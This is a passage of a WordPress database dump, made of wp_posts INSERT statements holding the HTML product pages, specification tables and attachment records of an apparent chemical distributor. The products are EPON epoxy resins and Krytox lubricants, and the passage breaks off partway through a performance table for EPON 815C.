INSERT INTO `wp_posts` VALUES (882, 3, '2016-08-26 15:24:59', '2016-08-26 15:24:59', '<p class="Section1">EPON 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. The resin itself is resistant to crystallization and also in blends with HELOXY™Modifiers.   EPON Resin 830 is somewhat higher in viscosity than EPON Resin 828, although the viscosity is still easily handled. It provides greater reactivity when combined with most curing agents.</p>\r\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Industrial floor toppings and grouting</li>\r\n 	<li>High build glaze, sealer or gel coats</li>\r\n 	<li>General purpose casting and encapsulation</li>\r\n 	<li>Base resin for dilution with Heloxy Modifiers</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Slightly higher viscosity than standard liquid epoxy</li>\r\n 	<li>Very good resistance to crystallization</li>\r\n 	<li>Higher reactivity at room temperature</li>\r\n 	<li>Low color</li>\r\n 	<li>Good chemical resistance</li>\r\n</ul>\r\nSpecifications\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Property</td>\r\n<td style="text-align: center;" valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Weight per Epoxide</td>\r\n<td style="text-align: center;" valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="132">\r\n<p align="center">190 – 198</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">170 – 225</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Color</td>\r\n<td style="text-align: center;" valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="132">\r\n<p align="center">1 max.</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p style="text-align: center;" align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Property</td>\r\n<td style="text-align: center;" valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td style="text-align: center;" valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" valign="top" width="211">Density at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lb/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9.7</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1475</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nEPON 830 liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 830 is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure. Please refer to the MSDS for the most current Safety and Handling information.\r\n\r\nMiller-Stephenson is an Epon 830 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPON™  830', 'EPON Resin 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. The resin itself is resistant to crystallization and also in blends with HELOXY™Modifiers. EPON Resin 830 is somewhat higher in viscosity than EPON Resin 828, although the viscosity is still easily handled. It provides greater reactivity when combined with most curing agents.  Benefits include:\r\n<ul>\r\n 	<li>Industrial floor toppings and grouting</li>\r\n 	<li>High build glaze, sealer or gel coats</li>\r\n 	<li>General purpose casting and encapsulation</li>\r\n 	<li>Base resin for dilution with Heloxy Modifiers</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-830', '', '', '2016-11-23 19:34:57', '2016-11-23 19:34:57', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=882', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (883, 3, '2016-08-26 15:24:15', '2016-08-26 15:24:15', '', '830', '', 'inherit', 'open', 'closed', '', '830', '', '', '2016-08-26 15:24:15', '2016-08-26 15:24:15', '', 882, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/830.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (884, 3, '2016-08-26 15:30:12', '2016-08-26 15:30:12', '', 'Epon unmodified epoxy', '', 'inherit', 'open', 'closed', '', 'epon-unmodified-epoxy', '', '', '2016-08-26 15:30:12', '2016-08-26 15:30:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Epon-unmodified-epoxy.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (885, 3, '2016-08-26 15:36:58', '2016-08-26 15:36:58', '', 'EPON™ 834', 'EPON™ Resin 834 is a BPA based epoxy resin that is semi-solid at room temperature. Systems using EPON Resin 834 can be formulated to be useful in a variety of high solids and tar modified coatings, high toughness adhesives, laminating, and prepreg molding materials. Because of its higher molecular weight, EPON Resin 834 provides enhanced system reactivity, surface tack and cured resin toughness in comparison to liquid grade BPA epoxies, but reduces elevated temperature performance. EPON Resin 834 is especially useful in applications requiring extra surface tack, cure speed or toughness but cannot tolerate additives or modifiers. Benefits include:\r\n<ul>\r\n 	<li>May be blended with other epoxy resins.</li>\r\n 	<li>Semi-solid at room temperature, pourable at slightly elevated temperatures.</li>\r\n 	<li> May be used to produce 10 to 15 mil films with high adhesion.</li>\r\n 	<li>Improved toughness, tack and cure speed over unmodified liquid epoxies</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-834', '', '', '2016-09-21 14:49:25', '2016-09-21 14:49:25', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=885', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (886, 3, '2016-08-26 15:36:24', '2016-08-26 15:36:24', '', '834', '', 'inherit', 'open', 'closed', '', '834', '', '', '2016-08-26 15:36:24', '2016-08-26 15:36:24', '', 885, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/834.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (887, 3, '2016-08-26 15:40:14', '2016-08-26 15:40:14', '<p class="Section1">EPON Resin 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F.  This resin contains no diluents or modifiers.  EPON Resin 862 may be used as the sole epoxy resin or combined with other resins such as EPON Resin 828. When blended with EPON 828, EPON 862 provides a technique to reduce viscosity with no sacrifice in chemical and solvent resistance properties, and the blended resin will exhibit improved crystallization resistance properties when compared to the neat, liquid, Bisphenol-A or Bisphenol-F type resins.  When EPON Resin 862 is cross-linked with appropriate curing agents, superior mechanical, adhesive, electrical and chemical resistance properties can be obtained.</p>\r\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Solventless or high solids/low VOC maintenance and marine coatings</li>\r\n 	<li>Chemical resistant tank linings, floorings, and grouts</li>\r\n 	<li>Fiber reinforced pipes, tanks, and composites</li>\r\n 	<li>Tooling, casting, and molding compounds</li>\r\n 	<li>Construction, electrical, and aerospace adhesives</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Reacts with a full range of epoxy curatives</li>\r\n 	<li>Good balance of mechanical, adhesive, and electrical properties</li>\r\n 	<li>Good chemical resistance</li>\r\n 	<li>Superior physical properties vs. diluted (6 Poise) resin</li>\r\n 	<li>Reduced diluent levels to achieve specific viscosity targets</li>\r\n 	<li>Higher solids or reduced solvent levels for coatings</li>\r\n 	<li>Improved handling and flow in colder application environments</li>\r\n 	<li>Improved fiber and filler wetting</li>\r\n</ul>\r\n<strong>Safety, Storage &amp; Handling</strong>\r\n\r\nPlease refer to the MSDS for the most current Safety and Handling information.\r\n\r\nPlease refer to the Hexion web site for Shelf Life and recommended Storage information.\r\n\r\nEPON 862 should be stored in tightly sealed containers of metal, glass, or polyolefin plastic at normal room temperatures.  If EPON Resin 862 develops haziness or crystallizes during storage, it can be restored to its original condition by gently warming the container and its contents to approximately 170-190°F until all visual evidence of crystallization is gone.  Upon cooling to normal ambient temperature conditions, the product will regain its original liquid state physical properties.  This process can be repeated as necessary. Exposure to these materials should be minimized and avoided, if feasible, through the observance of proper precautions, use of appropriate engineering controls and proper personal protective clothing and equipment, and adherence to proper handling procedures. <strong>None of these materials should be used, stored, or transported until the handling precautions and recommendations as stated in the Material Safety Data Sheet (MSDS) for these and all other products being used are understood by all persons who will work with them.</strong> Questions and requests for information on EPON products should be directed to your<a href="https://www.miller-stephenson.com/tech-support/"> Miller-Stephenson sales representative,</a>', 'EPON™ 862', 'EPON™ Resin 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F. This resin contains no diluents or modifiers. EPON Resin 862 may be used as the sole epoxy resin or combined with other resins such as EPON Resin 828. When blended with EPON Resin 828, EPON Resin 862 provides a technique to reduce viscosity with no sacrifice in chemical and solvent resistance properties, and the blended resin will exhibit improved crystallization resistance properties when compared to the neat, liquid, Bisphenol-A or Bisphenol-F type resins. When EPON Resin 862 is cross-linked with appropriate curing agents, superior mechanical, adhesive, electrical and chemical resistance properties can be obtained. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Reacts with a full range of epoxy curatives</li>\r\n 	<li>Good balance of mechanical, adhesive, and electrical properties</li>\r\n 	<li>Good chemical resistance</li>\r\n 	<li>Superior physical properties vs. diluted (6 Poise) resins</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-862', '', '', '2016-11-23 19:33:10', '2016-11-23 19:33:10', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=887', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (888, 2, '2016-08-26 15:47:18', '2016-08-26 15:47:18', '', 'NRT PLSS', 'Krytox NRT PLSS is recommended for use in applications requiring an H-1 rated lubricant.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-nrt-plss', '', '', '2016-10-03 15:14:06', '2016-10-03 15:14:06', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=888', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (889, 3, '2016-08-26 15:39:49', '2016-08-26 15:39:49', '', '862', '', 'inherit', 'open', 'closed', '', '862', '', '', '2016-08-26 15:39:49', '2016-08-26 15:39:49', '', 887, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/862.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (890, 3, '2016-08-26 15:44:40', '2016-08-26 15:44:40', '', 'EPON modified epoxy', '', 'inherit', 'open', 'closed', '', 'epon-modified-epoxy', '', '', '2016-08-26 15:44:40', '2016-08-26 15:44:40', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-modified-epoxy.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (891, 3, '2016-08-26 15:54:31', '2016-08-26 15:54:31', 'EPON 8280 Modified Liquid Epoxy Resin has been designed especially for formulating filled compounds for a wide variety of structural applications, including bonding, electrical encapsulating, tooling, flooring and most construction uses. EPON Resin 8280 is a low molecular weight resin with outstanding resistance to pigment and filler settling, which gives greater stability to filled systems. The resin also has superior resistance to foaming under vacuum and has an adjusted, controlled reactivity with amine curing agents, which serves to extend pot Iife and working life characteristics. In addition, viscosity stability — often a problem in anti-settling resins — presents no problem for EPON Resin 8280. It is as good in viscosity stability as other conventional liquid EPON Resins. Furthermore, it yields products with high physical strength, excellent chemical resistance and good electrical properties. Typical properties for several EPON 8280 amine-cured systems are given below.\r\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Adhesives</li>\r\n 	<li>Electrical encapsulation</li>\r\n 	<li>High solids coatings</li>\r\n 	<li>Vacuum processing</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low foaming</li>\r\n 	<li>High resistance to filler settling</li>\r\n 	<li>Controlled reactivity with amine curing agents</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>Sales Specification</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">185 – 195</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">110 – 150</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1 max.</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Specific gravity @ 20°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/ml</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1.168</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density at 20°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lb/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9.7</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1475</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Refractive index @ 25°C</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">1.570-1.575</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<div class="Section2">\r\n\r\nPro<strong>cessing/How to use</strong>\r\n\r\n<span style="text-decoration: underline;">Low Foaming Tendencies</span>\r\n\r\nEPON Resin 8280 Modified Liquid Epoxy Resin possesses the ability to inhibit foaming during out-gassing in vacuum processing applications. It also has a tendency to reduce bubbles and voids at ambient pressures.\r\n\r\n<span style="text-decoration: underline;">Controlled Reactivity with Amine Curing Agents</span>\r\n\r\nThe reactivity of EPON 8280 is controlled to provide more uniform reactivity between lots and greater ease of handling to the user. The reactivity is similar to undiluted resins,\r\n\r\ne.g., EPON Resin 828.\r\n\r\n<span style="text-decoration: underline;">Resistance to Filler Settling</span>\r\n\r\n</div>\r\n<div class="Section2">\r\n\r\nWhen compared to standard liquid epoxy resins, EPON Resin 8280 exhibits improved resistance to silica filler settling. This is illustrated in Figure 1, which reflects testing of EPON Resin 8280 and two other systems under three different conditions — 3 hours at 95 °C; 10 hours at 95 °C; and 72 hours at 60 °C. All three systems were prepared using finely divided silica. The curves in Figure 1 plot the depth of the settled layer excluding zero settling. The greater the curvature of the line, the softer the settling layer, and therefore, the more easily redispersed.\r\n\r\nIn the 3 hour test, EPON Resin 8280 showed virtually no settling, where the other two systems exhibited a small but hard layer of filler settling. In the 10 hour test, the EPON Resin 8280 system showed a shallow layer of soft settle, while the other two produced deeper and harder layers. In the most severe test, 72 hours, the EPON Resin 8280 system still exhibited a shallow layer of soft settling while the other two systems showed the same or a greater degree of disparity.\r\n\r\nSettling tendency was also tested for seven days at 25 °C (not shown in Figure 1). In this test, EPON Resin 8280 exhibited a negligible amount of soft settling, whereas with other systems tested, about half the filler content had settled in a hard layer.\r\n\r\nMiller-Stephenson is an Epon 8280 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\r\n\r\n</div>', 'EPON™ 8280', 'EPON™ Resin 8280 has been designed especially for formulating filled compounds for a wide variety of structural applications, including bonding, electrical encapsulating, tooling, flooring and most construction uses. EPON Resin 8280 is a low molecular weight resin with outstanding resistance to pigment and filler settling, which gives greater stability to filled systems. The resin also has superior resistance to foaming under vacuum and has an adjusted, controlled reactivity with amine curing agents, which serves to extend pot Iife and working life characteristics. In addition, viscosity stability —often a problem in anti-settling resins — presents no problem for EPON Resin 8280. It is as good in viscosity stability as other conventional liquid EPON Resins. Furthermore, it yields products with high physical strength, excellent chemical resistance and good electrical properties. Typical properties for several EPON Resin 8280 amine-cured systems are given below. Benefits include:\r\n<ul>\r\n 	<li>Low foaming</li>\r\n 	<li>High resistance to filler settling</li>\r\n 	<li>Controlled reactivity with amine curing agents</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-8280', '', '', '2016-11-23 19:31:40', '2016-11-23 19:31:40', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=891', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (892, 2, '2016-08-26 15:49:30', '2016-08-26 15:49:30', '', 'shutterstock_386837776', '', 'inherit', 'open', 'closed', '', 'shutterstock_386837776', '', '', '2016-08-26 15:49:30', '2016-08-26 15:49:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_386837776.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (893, 3, '2016-08-26 15:53:59', '2016-08-26 15:53:59', '', '8280', '', 'inherit', 'open', 'closed', '', '8280', '', '', '2016-08-26 15:53:59', '2016-08-26 15:53:59', '', 891, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/8280.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (894, 1, '2016-08-26 16:44:47', '2016-08-26 16:44:47', '', 'release1', '', 'inherit', 'open', 'closed', '', 'release1', '', '', '2016-08-26 16:45:35', '2016-08-26 16:45:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/release1.jpeg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (895, 3, '2016-08-26 17:26:24', '2016-08-26 17:26:24', '', 'EPON™ 8281', 'EPON™ Resin 8281 was developed for use in formulating highly filled compounds, particularly those with\r\nhigh levels of silica-type fillers. This resin allows the formulator to compound materials suitable for use in a\r\nwide variety of products, including adhesives, electrical encapsulants and molding compounds, tooling\r\ncompounds, and most construction end uses. Benefits include:\r\n<ul>\r\n 	<li>Excellent resistance to pigment and filler settling</li>\r\n 	<li>Low saponifiable chlorine level</li>\r\n 	<li>Superior resistance to foaming under vacuum</li>\r\n 	<li>Viscosity stability comparable to other conventional liquid EPON Resins</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-8281', '', '', '2016-09-21 15:01:27', '2016-09-21 15:01:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=895', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (899, 3, '2016-08-26 17:25:49', '2016-08-26 17:25:49', '', '8281', '', 'inherit', 'open', 'closed', '', '8281', '', '', '2016-08-26 17:25:49', '2016-08-26 17:25:49', '', 895, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/8281.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (900, 3, '2016-08-26 17:34:06', '2016-08-26 17:34:06', '', 'EPON™ 872', 'EPON™ Resin 872 is a chemically modified BPA based epoxy resin that is semi-solid at room temperature. Systems using EPON Resin 872 can be formulated with other EPON Resins, HELOXY™ Modifiers, or used as the sole resin to provide varying degrees of flexibility and toughness. EPON Resin 872 can be used with all curing agents. EPON Resin 872 provides cured resin toughness and flexibility in comparison to liquid grade BPA epoxies, but reduces elevated temperature performance. EPON Resin 872 is especially useful in applications requiring extra resistance to thermal shock or impacts. Benefits include:\r\n<ul>\r\n 	<li>May be blended with other epoxy resins.</li>\r\n 	<li>Semi-solid at room temperature, pourable at mildly elevated temperatures.</li>\r\n 	<li>May be used to produce potting and encapsulants of high thermal shock resistance.</li>\r\n 	<li>Improved toughness and flexibility over unmodified liquid epoxies.</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-872', '', '', '2016-09-21 14:51:05', '2016-09-21 14:51:05', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=900', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (901, 3, '2016-08-26 17:33:36', '2016-08-26 17:33:36', '', '872', '', 'inherit', 'open', 'closed', '', '872', '', '', '2016-08-26 17:33:36', '2016-08-26 17:33:36', '', 900, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/872.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (902, 3, '2016-08-26 17:47:21', '2016-08-26 17:47:21', '', 'EPON blended EPOXY', '', 'inherit', 'open', 'closed', '', 'epon-blended-epoxy', '', '', '2016-08-26 17:47:21', '2016-08-26 17:47:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-blended-EPOXY.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (903, 3, '2016-08-26 17:51:18', '2016-08-26 17:51:18', '', 'EPON™ 813', 'EPON™ Resin 813 is a low viscosity liquid bisphenol-A based epoxy resin diluted with HELOXY™ 62 cresyl\r\nglycidyl ether. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity for easy pumping and handling</li>\r\n 	<li>Reacts with full range of curing agents at low temperatures</li>\r\n 	<li>Produces high-strength, chemically resistant cured films</li>\r\n 	<li>Slightly lower odor than butyl glycidyl ether diluted epoxy resins</li>\r\n 	<li>Less prone to crystallization than other diluted epoxy resins</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-813', '', '', '2016-09-21 14:43:10', '2016-09-21 14:43:10', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=903', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (904, 3, '2016-08-26 17:50:46', '2016-08-26 17:50:46', '', '813', '', 'inherit', 'open', 'closed', '', '813', '', '', '2016-08-26 17:50:46', '2016-08-26 17:50:46', '', 903, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/813.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (905, 2, '2016-08-26 18:02:45', '2016-08-26 18:02:45', '', 'shutterstock_18414949', '', 'inherit', 'open', 'closed', '', 'shutterstock_18414949-2', '', '', '2016-08-26 18:02:45', '2016-08-26 18:02:45', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_18414949-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (906, 2, '2016-08-26 18:02:53', '2016-08-26 18:02:53', '', 'krytox_vpf_lvp_vacuumpump_grease', '', 'inherit', 'open', 'closed', '', 'shutterstock_126121829', '', '', '2016-08-29 13:52:05', '2016-08-29 13:52:05', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_126121829.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (907, 2, '2016-08-26 18:03:00', '2016-08-26 18:03:00', '', 'Krytox VPF 1506', '', 'inherit', 'open', 'closed', '', 'shutterstock_257574442', '', '', '2016-10-03 14:55:50', '2016-10-03 14:55:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_257574442.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (908, 2, '2016-08-26 18:03:08', '2016-08-26 18:03:08', '', 'Krytox VPF 1525', '', 'inherit', 'open', 'closed', '', 'shutterstock_373295623', '', '', '2016-10-03 15:00:16', '2016-10-03 15:00:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_373295623.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (909, 2, '2016-08-26 18:03:21', '2016-08-26 18:03:21', '', 'Krytox VPF 1514', '', 'inherit', 'open', 'closed', '', 'shutterstock_462371947', '', '', '2016-10-03 14:57:56', '2016-10-03 14:57:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_462371947.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (910, 3, '2016-08-26 18:06:52', '2016-08-26 18:06:52', '<p class="Section1">EPON 815C is a low viscosity liquid bisphenol <span class="GramE">A</span> based epoxy resin containing a commercial grade of n-butyl glycidyl ether. EPON Resin 815C is functionally equivalent to EPON Resin 815, and is suitable as a replacement for EPON Resin 815 in most applications.</p>\r\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Adhesives</li>\r\n 	<li>Electrical casting and encapsulation</li>\r\n 	<li>Contact and vacuum bag laminating</li>\r\n 	<li>Solventless coatings</li>\r\n 	<li>Floor topping and grouting compositions</li>\r\n 	<li>Tooling</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low viscosity, allows for easy pumping and wetting of pigments and fillers</li>\r\n 	<li>100% reactive. Reacts with a full range of curing agents</li>\r\n 	<li>Provides minimal reduction of performance properties</li>\r\n</ul>\r\n<strong> </strong>\r\n\r\n<span style="text-decoration: underline;"><strong>Performance Properties</strong></span>\r\n\r\nTable 1 / <strong>EPON 815C and EPON Resin 815 with EPIKURE Curing Agent 3282</strong>\r\n<table style="height: 1076px;" border="0" width="622" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="228"></td>\r\n<td valign="top" width="90">\r\n<p align="center"><b><u>Method</u></b></p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center"><b><u>Units</u></b></p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center"><b><u>A</u></b></p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center"><b><u>B</u></b></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">EPON 815C</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">---</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">EPON Resin 815</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">---</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">100</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">EPIKURE™ Curing Agent 3282</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">20.5</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p 